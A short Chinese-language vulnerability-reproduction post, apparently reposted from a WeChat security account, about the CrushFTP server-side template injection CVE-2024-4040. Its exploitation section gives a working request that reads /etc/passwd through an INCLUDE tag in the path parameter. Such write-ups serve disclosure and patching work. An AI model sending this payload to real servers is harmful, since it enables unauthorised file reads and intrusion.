本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
CrushFTP是一款支持FTP, FTPS, SFTP, HTTP, HTTPS, WebDAV and WebDAV SSL等协议的跨平台FTP服务器软件。它同时提供一个WEB接口让用户可以使用浏览器来管理他们的文件。
厂商官网:http://www.crushftp.com/
空间测绘
回复“20240426”获取空检测绘语句
漏洞描述
所有平台上 10.7.1 和 11.1.0 之前的所有版本中的 CrushFTP 中的服务器端模板注入漏洞允许未经身份验证的远程攻击者从 VFS 沙箱外部的文件系统读取文件、绕过身份验证以获得管理访问权限并执行远程代码在服务器上。
影响版本
10.7.1 和 11.1.0 之前的所有版本
漏洞利用
1.访问CrushFTP网站,需要cookie中“currentAuth”的值。
2.成功读取到文件“/etc/passwd”。
/WebInterface/function/?command=zip&c2f=iJg8&path=<INCLUDE>/etc/passwd</INCLUDE>&names=*
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2024-4040
https://github.com/rbih-boulanouar/CVE-2024-4040
https://github.com/Mufti22/CVE-2024-4040
回复“20240426”获取空检测绘语句
原文始发于微信公众号(不够安全):[漏洞复现] CVE-2024-4040 CrushFTP服务器端模板注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论